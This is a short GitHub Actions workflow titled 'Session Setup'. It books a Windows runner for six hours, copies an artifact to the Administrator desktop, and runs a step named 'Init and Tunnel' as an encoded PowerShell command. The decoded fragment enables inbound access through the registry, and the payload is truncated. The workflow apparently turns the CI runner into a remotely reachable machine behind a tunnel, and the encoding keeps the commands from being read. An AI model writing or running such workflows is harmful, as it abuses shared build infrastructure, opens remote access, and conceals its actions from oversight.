name: Session Setup

on:
  workflow_dispatch:

jobs:
  job-alpha:
    runs-on: windows-2022
    timeout-minutes: 360   # Max runtime 6 hours

    steps:
      - name: Setup latest .NET SDK
        uses: actions/setup-dotnet@v4
        with:
          dotnet-version: '8.x'

      - name: Download "data" artifact to Administrator Desktop (skip if not found)
        uses: actions/download-artifact@v5
        with:
          name: data
          path: C:\Users\Administrator\Desktop\data
        continue-on-error: true

      - name: Init and Tunnel
        run: |
          powershell -EncodedCommand IwAgAEUAbgBhAGIAbABlACAAaQBuAGIAbwB1AG4AZAAgAGEAYwBjAGUAcwBzAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgB[...]
